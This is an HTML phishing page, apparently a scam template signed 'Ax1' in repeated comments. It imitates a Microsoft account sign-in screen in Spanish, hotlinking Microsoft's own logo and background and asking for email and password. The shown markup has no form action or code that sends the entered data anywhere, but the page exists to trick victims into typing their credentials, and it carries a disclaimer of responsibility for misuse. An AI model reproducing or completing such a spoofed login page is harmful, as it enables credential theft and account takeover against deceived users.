<html><!-- scam by Ax1  GNU libre para modificaciones -->
<!-- No me hago responsable por el mal uso que puedan darle a este codigo -->
<style type="text/css">
    html, body {
        height: 100%;
        width: 100%;
        padding: 0;
        margin: 0;
    }
 
    #full-screen-background-image {
        z-index: -999;
        width: 100%;
        height: auto;
        position: fixed;
        top: 0;
        left: 0;
    }
	#caja{
		width:450;
		height:350;
		background:white;
		margin-top:160;
	}
	#e{
		width:100;
		height:40;
		color:white;
		background:#2B78FF;
		border:none;
		font-family:arial;
	}
	#i{
		width:400;
		height:40;
	}
	#a{
		text-decoration:none;
		font-size:15;
	}
</style>

<body><!-- scam by Ax1 -->
    <img alt="full screen background image" src="https://auth.gfx.ms/16.000.28103.6/images/Backgrounds/0-small.jpg?x=138bcee624fa04ef9b75e86211a9fe0d" id="full-screen-background-image" /> 
	<center><!-- scam by Ax1 -->
	<div id="caja"><br>
	<img src="https://auth.gfx.ms/16.000.28103.6/images/microsoft_logo.svg?x=ee5c8d9fb6248c938fd0dc19370e90bd">
	<br><br><font color="black" face="arial" size="5">Iniciar sesion</font><br><br>
	<input type="text" placeholder="correo electronico" id="i"><br><br>
	<input type="password" id="i" placeholder="contrasena" ><br><br><!-- scam by Ax1 -->
	<font face="arial">No tiene una cuenta? <a href="" id="a">Cree una.<br><br>He olvidado el nombre de usuario</a></p>
	<input type="submit" value="Siguiente" id="e">
	</div><!-- scam by Ax1 -->
	<!-- scam by Ax1 -->
</body></html>